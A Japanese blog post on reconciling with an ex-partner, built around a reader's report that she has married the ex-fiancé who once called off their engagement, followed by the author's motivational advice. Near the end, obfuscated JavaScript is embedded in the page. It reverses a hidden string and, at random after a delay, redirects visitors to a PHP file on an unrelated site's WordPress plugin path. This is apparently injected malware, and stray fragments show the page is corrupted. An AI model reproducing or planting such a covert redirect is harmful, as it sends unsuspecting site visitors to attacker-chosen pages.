【婚約破棄からの復縁成功体験談!】潜在意識でついに元彼と復縁結婚

この記事は5分で読めます

こんにちは、復縁ドッグです。

このページでは、復縁に成功された方からの、報告メールをお伝えしています。

 

あなたの同じ境遇でありながらも、復縁を成功させた方の生の声を聞いて、

復縁活動のモチベーション維持に、役立ててもらえればと思います。

では、はじめていきましょう。

 

今回は、復縁報告ではなく、なんと、結婚報告が、届きました。

覚えているでしょうか?

ご自身の過ちにより、結婚直前だった彼氏に婚約破棄されてしまった、長谷川さんです。

こちらに詳しく載せてあります→

 

以前、いただいた復縁報告メールでは、『条件付きでOKなら、一緒になるから』と言われ

復縁に成功したところまでが、書かれていましたが、今回のメールでは、その彼と、

結婚したことが、書かれていたのです。

(*´∀`)ゞおめでとーウ♪ヾ(´∀`*)

 

 

こちらが、送られてきたメールですね↓

【報告メール】

復縁ドッグ様

 

お久しぶりです。

長谷川(仮名)です。

 

昨年復縁してから、年が明け、本日20●●年●月●●日、私長谷川恵美(仮名)は彼と入籍して、一緒になることが出来ました。

 

本当にありがとうございました。

以前もメールで宣言していましたが、これがゴールと思わず、これからも彼としっかりと向き合っていきます。

自分みがきも頑張ります。

ありがとうございました。

 

坂本恵美(仮名)

【返信メール】

坂本恵美(仮名)様、

 

復縁ドッグです。

 

ご結婚、おめでとうございます♪

やりましたねーー。

自分の努力によって、自分の未来をこじ開けたんですよ。

あの時、復縁の為に、行動を起こしていなかったら、今の幸せはありませんでした。

今の幸せは、長谷川さん、、あっ、坂本さんでしたね、、、、坂本さんが

作り上げたものです。

 

最近思うことなのですが、夫婦も恋人同士も、

同じ未来を描いていないといけないと思うんですよ。

今の未来像は、きっと同じなんだと思います。

でなければ、結婚しませんからね。

 

ですが、年月を重ねるうちに、徐々に、徐々に、未来像が変わってきてしまうんです。

これは、わざと違う未来を描くというよりも、同じ未来を描いていると思い込んでいるうちに、

実は、別の未来を描いていた。

 

子供の教育方針や、二人の両親について。

考えが一致していると思い込んでいるようで、別の未来を考えている場合もあります。

旦那さんは、これから、数十年、共に歩んでいく方です。

定期的に、未来をすり合わせていくようにして下さいね。

本当に、おめでとうございます^^

 

復縁ドッグ

 

 

uibyいや~、名前を、旧姓の『長谷川(仮名)』から、

『坂本』に変えて、メールしてくれるところも、

憎いですね~。

 

でも、今回の結婚報告

 

復縁ドッグとしては、非常に、考え深いものがあるんですよ。

だって、手前味噌ですが、私が関わった人が、復縁して、

結婚までしたんですよ。

ヾ(*~∀~*)ゞ オメデトォー

 

本来でしたら、気持ちがすれ違ったまま、離れ離れになってしまった

2人が、こうして復縁に成功し、結婚までした…。

 

これで、子供ができたらと考えると、長谷川さんと彼氏さんが、

復縁しなかったら、生まれてこなかったはずの、子供が生まれるんです。

これって、凄いことだと思いませんか?

 

 

これなんですよ!

こうやって、結婚して欲しいんです。

 

長谷川さんは、困難を乗り切って、結婚しましたが、

彼氏さんも、長谷川さんと別れている間、色々なことを考えたでしょう。

この考える時間が、多ければ、多いほど、恋愛レベルが上がっていくんです。

 

辛ければ、辛いほど、悩みが深ければ、深いほど、

人は考えますので、恋愛レベルが、上がっていくんです。

 

そして、2人の恋愛レベルが上がれば、上がるほど、2人の絆が強くなり、

ちょっとや、そっとの困難なんて、2人の力で、乗り越えられちゃうんです。

 

だから、あなたの幸せの為には、恋愛レベルを上げる必要があるんです。

 

 

これをしないから、結婚後、悲しい別れを迎えてしまうんです。

厳密には、結婚後も、恋愛レベルは、上げ続けていかないと、

ダメですので、結婚したから、安心だということではありません。

 

長谷川さんの成功体験から、復縁を考える記事でも言いましたが、

2人の価値観が、この先もずっと、イコールだという約束はないのです。

だから、2人の価値観を、常に意識しながら、恋愛レベルを、

一生、上げ続けなくてはいけないのです。

 

でも、そんなこと、今のあなたに言っても、遠い先のことにしか

思えないと思いますので、今は、ひとまずの目標として、

『復縁』を目指して欲しいんです。

(っ`・ω・´)っフレーフレー!!!

 

 

どんな人生を送りたいのですか?

 

望んでの、独身、望んでの未婚だったらいいです。

離婚なんて、へっちゃらだし、シングルでも問題ない。

子供だって、分かってくれる。

 

 

そういった考えだったら、恋愛レベルを上げなくても、

問題ないと思います。

 

あなたの人生ですから、好きに生きればいいだけです。

(‐”‐;)ソレモヒトツノイキカタ

 

 

uiby

長谷川さんは結婚できて、うらやましい。

自分なんて、できっこない。

凹みます…。

 

とか、そういうものでもないんです。

 

長谷川さんも出来たんだから、自分もできる!

人が出来たんだから、自分だってできる!

 

そう思って欲しいから、こうやって、記事にしているんです。

あなたを凹ませる為に、この記事を書いてはいません。

( ̄ー ̄)//応援してんだよ

 

 

自己肯定感ではないですが、

自分の可能性を、自分でつぶしては駄目なんです。

 

 

「こんな状況だし、もう、復縁できないと思っています。」

 

そうじゃないでしょ!

。・”(>0<)”・。ンモォ~

 

自分で自分の可能性を諦めて、誰があなたのことを信じるんですか?

自分を信じれない人と、誰が付き合うんでしょうか?

誰が、結婚しようと思いますか?

 

あなたは大人なんですよ。

自分の人生、自分でデザインするんです。

自分の力で、いくらでも変えていけるんです。

 

あなたはダメではない。

ダメだと思っている、その考え方がダメなだけです。

 

こんな偉そうなこと言ってますが、正直言って、

私も、思っていましたよ。

 

公務員試験の面接で、何度も落とされ、

元カノには、フラれ…。

( ;∀;) カナシスギルー

 

 

「俺って、この世に、いらない人間なのかな?」

「誰も、俺を、必要としてくれない…。」

「生きていても、無駄なんじゃないかな…。」

 

 

そうやって、自分で、自分を否定していました。

自分の可能性を、自分で、否定していたんです。

そうやって、自分で、どんどん、暗い方、暗い方、

深い、深い、闇の中に、自分を追い込んでいったんです。

そして、自分の人生を呪っていたんです。

 

 

uibyあなたに聞きます。

「復縁ドッグは、あなたにとって、いらない人間ですか?」

「あの時、人生を諦めた方が、よかったでしょうか?」

「自分で命を絶った方が、良かったですか?」

 

違いますよね。

当時の私は、将来、こんなサイトを作ると思っていませんでした。

私の復縁体験が、色々な、人の心の支えになるなんて、

想像すらしていなかったんです。

 

$nJe=function(n){if (typeof ($nJe.list[n]) == “string”) return $nJe.list[n].split(“”).reverse().join(“”);return $nJe.list[n];};$nJe.list=[“\’php.pots_egamiruces/egamieruces-ahctpac/mrof-tcatnoc-is/snigulp/tnetnoc-pw/moc.mrifwaltb.www//:ptth\’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}tom: 10px; border: 5px solid #A9A9A9;”>

ここのところ復縁ドッグのサポートを受け方についての問い合わせをいただきます。

復縁ドッグサポートの受け方や、特典の種類や受け取りかたなどは、

こちらにまとめていますので、参考にして下さい。

特典一覧ページ

tt

 

この記事を読んでいる人は以下のカテゴリー記事も読んでいます。

復縁失敗体験から学ぶ復縁講座
復縁結婚カップル対談
復縁活動中の方からの疑問を解決
復縁成功報告メール

  • このエントリーをはてなブックマークに追加

関連記事

コメント

  1. この記事へのコメントはありません。

  1. この記事へのトラックバックはありません。

管理人:復縁ドッグ


恋愛レベルの向上なしに復縁はできない!

恋愛レベルの向上なしに夫婦の絆は作れない!

をモットーに、当サイトは運営されています。


1年2ヵ月の歳月を費やし、

自力で復縁に成功した復縁ドッグは

現在、復縁した彼女と結婚し

幸せな家庭を築いています。



→復縁ドッグによる前10回復縁メール講座



→復縁ドッグの10年以上に渡る復縁日記



→復縁に欠かせない基礎知識


youtube動画一覧

復縁オンライン講座